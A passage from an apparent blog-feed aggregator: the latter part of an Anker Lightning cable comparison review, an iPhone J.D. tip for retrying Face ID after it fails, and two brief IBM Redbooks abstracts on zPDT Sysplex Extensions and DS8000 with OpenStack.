I haven't tried to bend any of these cords 6,000 times, let alone 30,000 times.  I have tried to see what is different between the cords, and I see a few minor differences.  First, the nylon on the PowerLine+ II is thicker and feels a little softer than the PowerLine+.  Second, if I bend the PowerLine+, the cord tends to keep the shape of the bend, but if I bend the PowerLine+ II, the cord doesn't keep the shape as much.  I don't know if either of those two qualities has anything to do with durability.

I'm sure that the longer plugs on the PowerLine+ II are important for durability.  Since that is a common point of failure for the Apple Lightning cords, I can understand that Anker would want to make them as strong as possible.

Speaking of the plugs, keep in mind that — as I noted in my prior review — the Lightning end of the Anker cords is slightly larger than the Lightning end of Apple's cord.  If you have an iPhone case with a tiny hole for the Lightning cord made precisely for the Apple cord, it is possible that the Anker plug will be too big.  Otherwise, I doubt you will notice the difference.

Colors

The PowerLine+ cords come in four colors:  gray, red, white and golden.  I bought my original PowerLine+ cord for my car, and the dark gray color is a great match for my car's interior.  My wife picked the red color for her cord, and the red does look really nice.  Here are the gray and red colors:

The PowerLine+ II cords come in four colors:  black, red, silver and golden.  Here are the black, silver and golden colors:

The gray of the PowerLine+ is dark enough that it is only a shade lighter than the black of the PowerLine+ II.  The following picture shows all five cords, with the gray PowerLine+ at the top and the black PowerLine+ II in the middle:

Cases

One big difference between the two products is that the PowerLine+ comes with a felt pouch that folds over, whereas the PowerLine+ II comes with a nicer zippered pouch.  Here is the felt pouch for the PowerLine+:

Here is the pouch of the PowerLine+ II, the 3 foot version on the left, and the slightly larger 6 foot version on the right:

With both cases, you can wind up the cord inside of the case to make the part of the cord that comes out of each side just the length that you need.  This works with the felt pouch because both ends are open; this works with the zippered pouch because it has zippers at both ends. 

I think that most people would prefer the zippered pouch because it zips completely closed.  Both cases give you someplace to store the cord when you are not using it, but the PowerLine+ II version seems like a nicer case to toss into your purse, briefcase, luggage, etc.

Price difference

Typically, the PowerLine+ II cord costs $1 or $2 more than the same length PowerLine+ cord.  But this isn't always true.

You can buy these cords in 1 foot, 3 foot, 6 foot and 10 foot lengths.  The prices for the PowerLine+ versions are $12.99, $14.99, $16.99 and $17.99.  For the same length versions of the PowerLine+ II, the prices are $13.99, $15.99, $17.99 and $19.99.  But those prices can vary, both on Amazon and the Anker website.

Also, if you like the red color, the PowerLine+ can be even cheaper than the PowerLine+ II because Anker offers a two-pack:  two 3 foot cords for $19.99, or two 6 foot cords for $21.99.  And even if you just want a single red cord, as I type this, the 3 foot red cord is currently $13.99 ($1 cheaper) on Amazon and $11.99 on Anker's website.  I don't know if red is always cheaper or if there are other times in which another color is cheaper.

My recommendation

If you decide that you are ready to get a high-quality Lightning cable, these nylon-coated Anker cables get my very highest recommendation.  If you find that for the price and color that you want, the PowerLine+ II version is only $1 or $2 more, you might as well get the PowerLine+ II version.  Even to my eyes, the II version appears to be a little more durable, and Anker apparently thinks the difference is enough to offer the lifetime warranty with the II version.  Plus, the case is much nicer with the II version, which is something that you will notice right away.

But if you find that the price difference is more substantial, opting for the PowerLine+ version is still a fine choice.  When I purchased my new cords, I took advantage of the discount on the red PowerLine+ two-pack, which meant that I spent $11 on each red 6 foot cord versus $16 for a red PowerLine+ II version.  I'd make that same decision again.  For me, the nicer case and the increase in durability for a product that is already very durable isn't worth another $5 for each red cord. 

Here are links to the sizes and prices I'm seeing on Amazon right now:

PowerLine+ 1 foot ($12.99)

PowerLine+ II 1 foot ($13.99)

PowerLine+ 3 foot ($14.99); red PowerLine+ 3 foot ($13.99)

PowerLine+ 3 foot red two-pack ($19.99)

PowerLine+ II 3 foot ($15.99)

PowerLine+ 6 foot ($16.99)

PowerLine+ 6 foot red two-pack ($21.99)

PowerLine+ II 6 foot ($17.99)

PowerLine+ 10 foot ($17.99)

PowerLine+ II 10 foot ($19.99)

Categories: iPhone Web Sites

Face ID tip for non-recognition

iPhone J.D. - Mon, 01/01/2018 - 22:30

I'm a big fan of Face ID on the iPhone X.  It is a big improvement over the Touch ID fingerprint identification system on other iPhone models because, when it works, it provides security without any inconvenience at all.  You are looking at your iPhone anyway when you pick it up to use it, and then Face ID unlocks the phone, almost as if you didn't even have a passcode at all.  In an excellent recent article on the iPhone X, John Gruber of Daring Fireball described it this way:

Consider the aforementioned process of opening a notification from the lock screen. Touch ID adds an extra step, every time, even when it works perfectly. Face ID is not perfect — it’s true that I wind up either authenticating a second time or resorting to entering my PIN more often than with Touch ID — but it only adds these extra steps when it fails for some reason. When it works perfectly, which for me is the vast majority of the time, the effect is sublime. It really does feel like my iPhone has no passcode protecting it. That was never true for Touch ID. Touch ID feels like a better way to unlock your device. Face ID feels like your device isn’t even locked.

Unfortunately, as Gruber noted, the current generation of Face ID fails more often than Touch ID fails.  Here is a tip I recently figured out (just by dumb luck) for dealing with Face ID when it does fail.

If Face ID fails on the Lock screen, you are presented with a keypad to type in a numeric passcode.  If you want to try Face ID again, I previously thought that the only way to do so was to press the cancel button and start all over again. 

Here is a better way.  If you turn your iPhone away from your face for just a second — so that the Face ID camera is looking at something else — and then you turn it back towards your face, I find that Face ID works the second time almost 100% of the time.  This saves you the trouble of pressing that cancel button and starting over again.  Just slightly rotate your wrist, turn it back, and you are done.

This also works with apps that use Face ID as an alternative to typing a username and password.  If Face ID fails, you will see a message like this one with the option to tap an on-screen button to Try Face ID Again:

But you can ignore that button.  Just turn the iPhone away from your face, then bring it back, and Face ID will see you without you having to touch the screen at all.  You'll see the green happy face, and then the app will unlock.

Since I started using this method, the relatively rare instances in which Face ID fails have become far less annoying for me.

Categories: iPhone Web Sites

IBM zPDT 2017 Sysplex Extensions

IBM Redbooks Site - Sat, 12/30/2017 - 08:30
Draft Redbook, last updated: Sat, 30 Dec 2017

This IBM® Redbooks® publication describes the IBM System z® Personal Development Tool (IBM zPDT®) 2017 Sysplex Extensions, which is a package that consists of sample files and supporting documentation to help you get a functioning, data sharing sysplex up and running with minimal time and effort.

Categories: Technology

Using IBM DS8000 in an OpenStack Environment

IBM Redbooks Site - Thu, 12/28/2017 - 08:30
Redpaper, published: Thu, 28 Dec 2017

With the availability of the IBM® Storage Driver for OpenStack, the IBM DS8000® can offer a range of capabilities that enable more effective storage automation deployments to private or public clouds.

Categories: Technology
